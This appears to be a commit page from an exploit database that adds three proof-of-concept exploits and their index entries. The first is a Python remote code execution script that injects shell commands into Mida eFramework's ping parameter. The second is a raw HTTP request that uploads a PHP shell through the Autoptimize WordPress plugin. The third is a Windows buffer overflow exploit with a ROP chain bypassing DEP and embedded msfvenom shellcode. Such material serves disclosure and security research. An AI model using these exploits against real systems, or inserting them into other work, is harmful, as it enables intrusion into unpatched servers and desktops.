DB: 2020-08-28
3 changes to exploits/shellcodes ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC) Mida eFramework 2.9.0 - Remote Code Execution Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
This commit is contained in:
parent
8bf2002f51
commit
2621b3c52e
4 changed files with 292 additions and 0 deletions
72
exploits/multiple/webapps/48768.py
Executable file
72
exploits/multiple/webapps/48768.py
Executable file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
|
||||
# Google Dork: Server: Mida eFramework
|
||||
# Date: 2020-08-27
|
||||
# Exploit Author: elbae
|
||||
# Vendor Homepage: https://www.midasolutions.com/
|
||||
# Software Link: http://ova-efw.midasolutions.com/
|
||||
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
|
||||
# Version: <= 2.9.0
|
||||
# CVE : CVE-2020-15920
|
||||
|
||||
|
||||
#! /usr/bin/python3
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
import argparse
|
||||
import requests
|
||||
import subprocess
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
|
||||
def print_disclaimer():
|
||||
print("""
|
||||
---------------------
|
||||
Disclaimer:
|
||||
1) For testing purpose only.
|
||||
2) Do not attack production environments.
|
||||
3) Intended for educational purposes only and cannot be used for law
|
||||
violation or personal gain.
|
||||
4) The author is not responsible for any possible harm caused by this
|
||||
material.
|
||||
---------------------""")
|
||||
|
||||
|
||||
def print_info():
|
||||
print("""
|
||||
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
|
||||
[*] Reference:
|
||||
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
|
||||
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
|
||||
(RCE) in PDC/ajaxreq.php
|
||||
Version\t< 2.9.0\t./CVE-2020-15920
|
||||
http://192.168.1.60:8090/PDC/ajaxreq.php id
|
||||
Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
|
||||
id """)
|
||||
|
||||
def pwn(url,cmd):
|
||||
running = """
|
||||
[*] Target URL: {0}
|
||||
[*] Command: {1}
|
||||
"""
|
||||
print(running.format(url,cmd))
|
||||
data = {
|
||||
"DIAGNOSIS":"PING",
|
||||
"PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
|
||||
}
|
||||
r = requests.post(url,data=data,verify=False)
|
||||
line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
|
||||
pretty_output = r.text.replace('<br>','\n')
|
||||
print(line+"\n{0}\n".format(pretty_output)+line)
|
||||
|
||||
def main():
|
||||
print_info()
|
||||
print_disclaimer()
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target", type=str, help="the complete target URL")
|
||||
parser.add_argument("cmd", type=str, help="the command you want to run")
|
||||
args = parser.parse_args()
|
||||
pwn(args.target, args.cmd)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
84
exploits/php/webapps/48770.txt
Normal file
84
exploits/php/webapps/48770.txt
Normal file
|
@ -0,0 +1,84 @@
|
|||
# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
|
||||
# Date: 2020-08-24
|
||||
# Software Link: https://wordpress.org/plugins/autoptimize/
|
||||
# Author : SunCSR Team
|
||||
# Version: v2.7.6
|
||||
# Tested on Ubuntu 18.04 / Kali Linux
|
||||
# Reference: https://wpvulndb.com/vulnerabilities/10372
|
||||
|
||||
Description :
|
||||
-------------------------------------------------------------------
|
||||
|
||||
The ao_ccss_import AJAX call does not ensure that the file provided is a
|
||||
legitimate Zip file, allowing high privilege users to upload arbitrary
|
||||
files, such as PHP, leading to RCE.
|
||||
|
||||
[POC]
|
||||
|
||||
Step 1 :
|
||||
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: pwnme
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
|
||||
Firefox/80.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer:
|
||||
http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------26086940735210916964189813544
|
||||
Content-Length: 685
|
||||
Origin: http://pwnme
|
||||
Connection: close
|
||||
Cookie: autoptimize_feed=1;
|
||||
wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd;
|
||||
wordpress_test_cookie=WP+Cookie+check;
|
||||
wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602;
|
||||
wp-settings-time-1=1598516614
|
||||
|
||||
|
||||
-----------------------------404272946439029073744006559647
|
||||
Content-Disposition: form-data; name="file"; filename="shell.php"
|
||||
Content-Type: application/zip
|
||||
|
||||
<?php Shell Content Here ! ?>
|
||||
-----------------------------404272946439029073744006559647
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
ao_ccss_import
|
||||
-----------------------------404272946439029073744006559647
|
||||
Content-Disposition: form-data; name="ao_ccss_import_nonce"
|
||||
|
||||
f25ca64f22
|
||||
-----------------------------404272946439029073744006559647--
|
||||
|
||||
|
||||
[Response]
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: nginx/1.14.0 (Ubuntu)
|
||||
Date: Thu, 27 Aug 2020 08:21:08 GMT
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Connection: close
|
||||
Access-Control-Allow-Origin: http://pwnme.me
|
||||
Access-Control-Allow-Credentials: true
|
||||
X-Robots-Tag: noindex
|
||||
X-Content-Type-Options: nosniff
|
||||
Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Content-Length: 53
|
||||
|
||||
{"code":"200","msg":"Settings imported successfully"}
|
||||
|
||||
|
||||
Step 2: Access to
|
||||
http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php
|
||||
|
||||
|
||||
Recommendations: Update to version 2.7.7
|
||||
|
||||
|
||||
Thank you very much!
|
133
exploits/windows/local/48769.py
Executable file
133
exploits/windows/local/48769.py
Executable file
|
@ -0,0 +1,133 @@
|
|||
# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
|
||||
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
|
||||
# Exploit Author: Paras Bhatia
|
||||
# Discovery Date: 2020-08-25
|
||||
# Vulnerable Software: ASX to MP3 converter
|
||||
# Version: 3.1.3.7.2010.11.05
|
||||
# Vulnerability Type: Local Buffer Overflow
|
||||
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
|
||||
|
||||
# Proof of Concept :
|
||||
|
||||
# 1.- Run python code: asx_to_mp3_rop_exploit.py
|
||||
# 2.- Works on DEP enabled for ASX2MP3Converter.exe
|
||||
# 3.- Open "ASX2MP3Converter.exe"
|
||||
# 4.- Click on "Load" Button
|
||||
# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
|
||||
# 6.- Click on "Open".
|
||||
# 7.- Calc.exe runs.
|
||||
|
||||
|
||||
#################################################################################################################################################
|
||||
|
||||
#Python "asx_to_mp3_rop_exploit.py" Code:
|
||||
|
||||
import struct
|
||||
file = 'asx_to_mp3_rop_exploit.wax'
|
||||
|
||||
|
||||
payload = "http://"
|
||||
payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC"
|
||||
|
||||
|
||||
## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python
|
||||
|
||||
buf = ""
|
||||
buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33"
|
||||
buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05"
|
||||
buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70"
|
||||
buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e"
|
||||
buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8"
|
||||
buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99"
|
||||
buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7"
|
||||
buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a"
|
||||
buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27"
|
||||
buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26"
|
||||
buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a"
|
||||
buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3"
|
||||
buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0"
|
||||
buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d"
|
||||
buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf"
|
||||
buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96"
|
||||
buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa"
|
||||
|
||||
|
||||
|
||||
## Save allocation type (0x1000) in EDX
|
||||
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
|
||||
payload += struct.pack('<L', 0x11112112)
|
||||
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
|
||||
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
|
||||
payload += struct.pack('<L', 0xEEEEEEEE)
|
||||
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
|
||||
payload += struct.pack('<L', 0x41414141)
|
||||
|
||||
|
||||
## Save the address of VirtualAlloc() in ESI
|
||||
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN
|
||||
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc()
|
||||
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN
|
||||
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
|
||||
payload += struct.pack('<L', 0x41414141)
|
||||
payload += struct.pack('<L', 0x41414141)
|
||||
|
||||
|
||||
## Save the size of the block in EBX
|
||||
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
|
||||
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
|
||||
|
||||
|
||||
|
||||
## Save the address of esp in EBP
|
||||
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
|
||||
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
|
||||
|
||||
|
||||
|
||||
##Save memory protection code (0x40) in ECX
|
||||
payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN
|
||||
payload += struct.pack('<L',0xffffffff)
|
||||
payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
|
||||
payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
|
||||
|
||||
|
||||
## Save ROP-NOP in EDI
|
||||
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
|
||||
payload += struct.pack('<L', 0x10010C8A) # RETN
|
||||
|
||||
|
||||
|
||||
|
||||
## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
|
||||
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
|
||||
payload += struct.pack('<L', 0xA4E2F275)
|
||||
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
|
||||
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
|
||||
|
||||
|
||||
|
||||
payload += "\x90" * 4
|
||||
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
|
||||
payload += "\x90" * 20
|
||||
payload += buf
|
||||
|
||||
|
||||
|
||||
f = open(file,'w')
|
||||
f.write(payload)
|
||||
f.close()
|
|
@ -11139,6 +11139,7 @@ id,file,description,date,author,type,platform,port
|
|||
48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
|
||||
48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
|
||||
48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
|
||||
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -43006,3 +43007,5 @@ id,file,description,date,author,type,platform,port
|
|||
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
|
||||
48765,exploits/multiple/webapps/48765.txt,"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery",2020-08-26,hyp3rlinx,webapps,multiple,
|
||||
48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
|
||||
48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,
|
||||
48770,exploits/php/webapps/48770.txt,"Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)",2020-08-27,"SunCSR Team",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue